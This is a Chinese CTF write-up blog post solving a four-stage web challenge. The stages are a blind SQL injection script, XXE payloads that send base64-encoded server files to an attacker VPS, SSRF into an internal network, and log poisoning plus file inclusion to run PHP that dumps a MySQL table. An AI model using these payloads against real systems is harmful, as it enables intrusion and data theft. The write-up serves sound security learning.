gakki

最新推荐文章于 2024-03-25 09:34:09 发布
最新推荐文章于 2024-03-25 09:34:09 发布
阅读量484 收藏
点赞数
文章标签: 渗透测试 实例

工具安装

1. burpsuite

  • 下载pentestBox之后直接点击bin目录下burpsuite的jar包使用默认设置;
  • 浏览器这边firefox下载FoxyProxy插件设置代理127.0.0.1

2. dirhunt

win下打开cmd

$pip install dirhunt

3. Xshell

下载安装连接服务器即可

在这里插入图片描述

flag_1:扫描隐藏页面

flag{warm_up}

先dirhunt扫描隐藏的页面:
发现还有index.php页面(ps.dirhunt安装直接pip install dirhunt就行)

  • 于是访问124.16.75.162:40006/index.php
  • 在burpSuite保证 “intercept is on”
  • 然后不断点击forward
  • 在HTTPS History->找到index.php记录->response标签窗口得到flag:
    flag{warm_up}

flag_2:盲注

flag{admin_pass_is_awedc123Z}

点击“点我看gakki”跳转到hint.php界面,根据上一个flag分析可得hint表存在id、hint两个字段。
实验id=1之后接上union、select、from等字段都已经被过滤。
进行un/**/ion等绕过攻击仍然无法查询,于是想到盲注,下面介绍两种盲注方法:

	url = "http://124.16.75.162:40006/hint.php?id=id=1"+and+(if(mid(hint,1,1)>'a',1,pow(999,999)))%23"
  • mid的意思是从hint的第一个字母开始截取一个字符长度。
  • (if(A),B,C)的含义的意思是判断A城里的时候执行B否则执行C,这里C是pow(999,999)求高次方会引发数据库崩溃报错,由此判断对应的hint值是哪个字符。
    为了高效遍历整个flag字符串写python脚本如下:
import requests
flag = ""
for i in range(1,100):
	print("the %d st"%i)
	for ch in range(48,126):
		if((ch >= 91 and ch <= 96 ) or ch == 35 or ch == 37):
			continue
		url = "http://124.16.75.162:40006/hint.php?id=2\"+and+(if(mid(hint,%d,1)>'%s',"%(i,chr(ch))+"1,pow(999,999999)))%23"
		#print(chr(ch))
		data = requests.get(url)
		#print(data.text)
		if("sql" in data.text):
			print(chr(ch))
			flag += chr(ch)
			break

print(flag)

#输出:flag{admin 0 pass 0 is 0 awedc123Z}也可将a替换成“_”得到login页面的账号是admin密码是awedc123Z

输入密码后跳转到该界面

flag_3:xxe

flag{gakki_is_watching_you}

在该页面点击submit这是抓包可以看到发送了一个空数据:
data后数据为空
在data后添加:

data=<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data  [
<!ENTITY % file SYSTEM 
"php://filter/convert.base64-encode/resource=/tmp/index.php.bak">
<!ENTITY % dtd SYSTEM "http://vps_cpr/xxe_cpr.xml">
%dtd; %send;
]>
/*注意data后面不能换行*/

在服务器上新建xxe_cpr.xml:

<!ENTITY % payload2 
"<!ENTITY &#x25; send SYSTEM 'http://vps_cpr/%file;'>"
> 
%payload2;

整个的调用过程如下:解析时%dtd引入xxe_cpr.xml,之后%all引入send的定义,最后引用了实体send,把%file文件内容通过一个http请求发了出去。注意需要把payload2经过url编码。查看vps上的access.log:
传送文件加密如图解密结果如上这个暂时还用不到,同理构造读取flag.php传送数据的xml:
/这儿少一段怎么意识到探测flag.php的/

data=<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data  [
<!ENTITY % file SYSTEM 
"php://filter/convert.base64-encode/resource=flag.php"
>
<!ENTITY % dtd SYSTEM 
"http://120.78.203.136:81/xxe_cpr.xml"
>
%dtd; 
%send;
]>

同理flag.php

flag_4:SSRF

flag{log_is_ez_to_include}

首先vps放文件file.dtd,内容如下:

漏洞处(也就是burpsuite上跟在data后面)

data=<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://vps_cpr/file.dtd">
%remote;
%int;
%trick;]
>

服务器端建立file_cpr.dtd查看漏洞处的域名文件:

<!ENTITY % payl SYSTEM 
"php://filter/read=convert.base64-encode/resource=file:///etc/hosts"
>
<!ENTITY % int 
"<!ENTITY &#37; trick SYSTEM 'http://vps_cpr/?p=%payl;'>"
>

结果如下图:发现一个未知内网172.26.0.5在这里插入图片描述然后srrf查看漏洞处/proc/net/arp
漏洞处:

data=<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://vps_cpr/file_cpr_arp.dtd">
%remote;
%int;
%trick;]>

服务器处的file_cpr_arp.dtd:

<!ENTITY % payl SYSTEM 
"php://filter/read=convert.base64-encode/resource=file:///proc/net/arp">
<!ENTITY % int 
"<!ENTITY &#37; trick SYSTEM 'http://120.78.203.136:81/?p=%payl;'>">

得到所有内网显示如下:

IP address       HW type     Flags       HW address            Mask     Device
172.26.0.7       0x1         0x0         00:00:00:00:00:00     *        eth0
172.26.0.1       0x1         0x2         02:42:ef:87:8a:aa     *        eth0
172.26.0.3       0x1         0x2         02:42:ac:1a:00:03     *        eth0
172.26.0.8       0x1         0x0         00:00:00:00:00:00     *        eth0
172.26.0.4       0x1         0x2         02:42:ac:1a:00:04     *        eth0
172.26.0.6       0x1         0x0         00:00:00:00:00:00     *        eth0
172.26.0.2       0x1         0x2         02:42:ac:1a:00:02     *        eth0

于是挨个探索不同内网段是否包含log_hahahaha.php等文件:

漏洞端输入:

data=<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://vps_cpr/file_cpr.dtd">
%remote;
%int;
%trick;]>

服务器端构造file_cpr.dtd:

<!ENTITY % payload SYSTEM 
"http://172.26.0.4/index.php?file=php://filter/read=convert.base64-encode/resource=index.php">
<!ENTITY % int 
"<!ENTITY &#37; trick SYSTEM 'http://vps_cpr/get.php?file=%payload;'>">
%int;
%trick;

SSRF读取index.php:

<?php
	error_reporting(0);
	$file=$_GET['file'];
	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data"))
	{
		echo "Oh no!";
		exit();
	}
	include($file); 
	//log_hahahaha.php
	//dump_lalalalala.sql
?>

同理得到dump_lalalalala.sql:

USE `flag`;

DROP TABLE IF EXISTS `flag`;
CREATE TABLE `flag` (
  `flag` VARCHAR(100)
);

CREATE USER 'rebirth'@'%';
GRANT USAGE ON *.* TO 'rebirth'@'%';
GRANT SELECT ON `flag`.* TO 'rebirth'@'%';

得到log_hahahaha.php(四个ha!!!)

<?php
    error_reporting(0);
    class Awd
    {
        public function __construct($filepath)
        {
            $this->filepath = $filepath;
        }

        public function Flow()
        {
            $HTTP_Method = $_SERVER['REQUEST_METHOD'];
            if(!file_exists($this->filepath))
            {
                mkdir($this->filepath,0777);
            }
            $filename = $this->filepath."access.log";
            $request_url = $_SERVER['REQUEST_URI'];
            $protocol = $_SERVER['SERVER_PROTOCOL'];
            $ip = $_SERVER['REMOTE_ADDR'];
            $time = date('Y/m/d h:i:s');
            $content = $ip."\t".$time."\t\n".$HTTP_Method.' '.$request_url.' '.$protocol."\r\n";
            if (isset($_GET['log'])) $content=urldecode($_GET['log']);
            file_put_contents($filename,$content,FILE_APPEND);
        }
    }
    if(isset($_GET['auth'])){
        if(preg_match("/[^A-Za-z]/",$_GET['auth']))
            {die();}
    }
    else{
            die();
    }
    if(file_exists("/home/log/".$_GET['auth']."/access.log"))
        @unlink("/home/log/".$_GET['auth']."/access.log");
    $Catchs = new Awd("/home/log/".$_GET['auth']."/");
    $Catchs->Flow();
?>

分析log_hahahaha.php和dump_lalalalala.sql文件可知:

仔细阅读上面两个文件代码,可以发现php文件是创建传入参数auth和参数log并写入,并把log后面传入的内容写入/home/log/[auth]/access.log中。sql文件是提示存在mysql数据库,host名为mysql,表名为flag,用户名为rebirth,并且用户rebirth有执行select的权限。 于是我们构造一个用户名作为auth传入的参数,读取mysql数据库的php代码作为log传入的参数。 我们想要创建一个hackerz的用户名,然后把读取mysql数据库的php代码通过URL编码,注意php代码要合并到一行里,php为:
<?php $con = new mysqli("mysql", "rebirth", "", "flag"); if ($con->connect_error) {echo "fail";} $sql = "SELECT * FROM flag"; $result = $con->query($sql);if ($result->num_rows > 0) {while($row = $result->fetch_row()) {echo base64_encode($row[0]);}}else {echo "0";};$con->close();?>

<?php $con = new mysqli("mysql", "rebirth", "", "flag"); 
if ($con->connect_error) {echo "fail";} 
$sql = "SELECT * FROM flag"; 
$result = $con->query($sql);
if ($result->num_rows > 0) {
	while($row = $result->fetch_row()) {
		echo base64_encode($row[0]);
	}
}else {echo "0";};
$con->close();
?>

然后对该php代码进行url编码,然后构造请求log_hahahaha.php来创建用户hackerz和上传log内容的URL,再合并到xxe.xml,同样通过之前xxe的方式来完成上传php文件到/home/log/hackerz/access.log的过程。 此时放在我们服务器上的xxe.xml:

<!ENTITY % payload SYSTEM 
"http://172.26.0.4/log_hahahaha.php?auth=hackerz&log=%3c%3fphp+%24con+%3d+new+mysqli(%22mysql%22%2c+%22rebirth%22%2c+%22%22%2c+%22flag%22)%3b+if+(%24con-%3econnect_error)+%7becho+%22fail%22%3b%7d+%24sql+%3d+%22SELECT+*+FROM+flag%22%3b+%24result+%3d+%24con-%3equery(%24sql)%3bif+(%24result-%3enum_rows+%3e+0)+%7bwhile(%24row+%3d+%24result-%3efetch_row())+%7becho+base64_encode(%24row%5b0%5d)%3b%7d%7delse+%7becho+%220%22%3b%7d%3b%24con-%3eclose()%3b%3f%3e">
<!ENTITY % int 
"<!ENTITY &#37; trick SYSTEM 'http://39.96.57.253/get.php?file=%payload;'>">
%int;
%trick;

然后我们要利用index.php的漏洞来使得这个access.log文件中的php代码被执行,构造放在我们服务器上的xxe_file.xml:

<!ENTITY % payload SYSTEM 
"http://172.26.0.4/index.php?file=/home/log/hackerz/access.log">
<!ENTITY % int 
"<!ENTITY &#37; trick SYSTEM 'http://39.96.57.253/get.php?file=%payload;'>">
%int;
%trick;

再依照前面xxe过程进行两次,输入框中需要修改的内容分别是先执行xxe.xml然后执行xxe_file.xml。最后功夫不负有心人,在file=后面成功拿到了echo的返回值得到最终结果:
在这里插入图片描述

s11show_163
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【KaliLinux】————3、Git_Extract安装与使用
Fly_鹏程万里
08-17 4772
前言 .git泄露是一种常见的web类安全漏洞,当一个网站存在git泄漏,攻击者可以通过git还原代码,从而获取网站源码等敏感文件。 .git泄露利用工具 项目地址:https://github.com/gakki429/Git_Extract 工具特点: 恢复项现包括: index 缓存 HEAD 现分支的恢复 logs/HEAD 日志 refs/stash 工作进度保...
npm install时报sudo chown -R 501:20,如何解决
海蒂
08-15 3077
注意:完全复制下来执行,我在执行过程中的时候去掉引号就进入dquote模式下,这样并不能解决什么~遇到以上情况只需要按照他的提示执行。这段代码,问题即可解决。
BUUCTF MISC 41-60
qq_52696970的博客
03-17 1108
BUUCTF MISC 41-60
探索DirHunt:高效Web目录扫描工具
最新发布
gitblog_00058的博客
03-25 652
探索DirHunt:高效Web目录扫描工具 dirhuntFind web directories without bruteforce项目地址:https://gitcode.com/gh_mirrors/di/dirhunt 在网络安全和网站渗透测试领域,DirHunt是一款强大的开源工具,它用于发现Web服务器上未公开的目录和文件。这款由Nekmo开发的项目,可以帮助开发者、安全研究人员以...
dirhunt使用手册,中文版
m0_48096446的博客
11-02 190
dirhunt -k “login,credentials” --to-file /path/to/report.json https://example.com(查找包含 login 或 credentials 关键词的文件,并将结果保存为 JSON 文件)例子:dirhunt -x “flag1,flag2” https://example.com(排除包含 flag1 和 flag2 的结果)-f, --interesting-files TEXT:具有指定文件名的文件被认为是有趣的。
<?php highlight_file(__FILE__); error_reporting(0); $file = $_GET["file"]; if (stristr($file, "file")){ die("你败了."); } //fl
weixin_35753431的博客
01-11 1713
这段代码是一个 PHP 程序,它实现了从用户输入中获取文件名并输出文件内容的功能。 首先,通过调用 highlight_file(FILE) 函数来输出代码,并通过 error_reporting(0) 函数来关闭错误报告。 然后,通过 $_GET["file"] 变量来获取文件名。 之后,判断文件中是否包含"file"字符串 ,如果包含的话,输出 "你败了." 最后,通过 file_get_c...
base解码_php://filter在一次CTF中base被过滤的利用
weixin_39565910的博客
11-27 897
0x00 简介在一次线下ctf中的web题有一道关于php://filter伪协议的利用0x01题目分析靶机环境http://192.168.1.151:88/flag.php 存放flag信息的http://192.168.1.151:88/index.php 注释中有include1.phpinclude1代码如下error_reporting(0); @$file = $_G...
Gakki::blossom::cherry_blossom:Mastodon的React Native应用程序。一个由React Native编写的长毛象客户端App:butterfly:
02-03
cd ./Gakki yarn // or npm i 创建本地配置文件 在src/utils/config.js创建文件,其中包含: export const token = 'Bearer xxxxxxxx' // required. (Watch out: there is a blank space.) export const version =...
BUU misc(GXYCTF2019)
ChanCherry的博客
01-31 2282
下载压缩包之后是一张gakki的图片, foremost一下,得到一个压缩包,包里有flag.txt,但是需要密码才能打开。尝试数字爆破,得到密码8864,打开之后得到一串奇奇怪怪的字符, 看了大佬的wp,对于这种无规律的字符集要尝试字频统计,附上字频统计exp: alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1...
Python图像处理PIL各模块详细介绍
热门推荐
章子雎的博客
01-21 20万+
Image模块 Image模块是在Python PIL图像处理中常见的模块,对图像进行基础操作的功能基本都包含于此模块内。如open、save、conver、show…等功能。 open类 Image.open(file) ⇒ image Image.open(file, mode) ⇒ image 要从文件加载图像,使用 open() 函数, 在 Image 模块:
文件上传漏洞最强总结
Jack_chao_的博客
04-07 411
没写完后续补充
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 6028
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
BUU CTF web(四)
0xdawn的博客
05-11 5365
[HarekazeCTF2019]encode_and_encode <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob
CTFshow--web入门--命令执行(29--55)
weixin_53425135的博客
11-23 2518
CTFshow–web入门 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag,可以使用通配符进行绕过 : ?c=system(‘cat f*’); web30 <?p
针对burpsuite无法成功pojie的的几点修复建议
qq_38053759的博客
11-10 5858
本文针对burpsuite无法运用注册机pojie的几点修复建议,均是亲身经历走过的坑,希望能帮助到您,如有疑问可以留言,看到会第一时间回复。 burpsuite及注册机下载链接:https://download.csdn.net/download/qq_38053759/11016639 1.注册机运行环境最好是JDK8环境(某些小版本可能不支持),亲测JDK1.8.0_152可用(其它...
bugkuctf web基础部分 writeup
river
03-20 2878
Bugku-ctf-web 管理员系统 随便输入用户名和密码提示 窗体顶端 窗体底端 IP禁止访问,请联系本地管理员登陆,IP已被记录. 明显需要伪造允许登录的IP 知识点: XFF头(X-Forwarded-For),代表客户端,也就是HTTP的请求端真实的IP。有两种方式可以从HTTP请求中获得请求者的IP地址。一个是从Remote Address中获得,另一个是从X-Forward-For中...
PHP代码审计总结(2)
qq_40529133的博客
05-05 630
1, strpos数组绕过NULL与ereg正则%00截断 <?php $flag = "flag"; if (isset ($_GET['nctf'])) { if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE) echo '必须输入数字才行'; ...
OWASP学习之SQL注入
s11show_163的博客
02-28 986
一、sql注入的注入点: 参数名 参数值 cookie 目录文件名 工具:sev3wvs或者啊D注入 是否存在sql注入: select * from news where id = 3-1' ##加单引号如果id=1‘、id=2‘、id=-1’、id=1 and 1=1‘ ##以及id=1‘ and1=2‘的返回结果不一样则说明存在注入。 ##也可以取消后面的单引号用‘#’或者‘...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值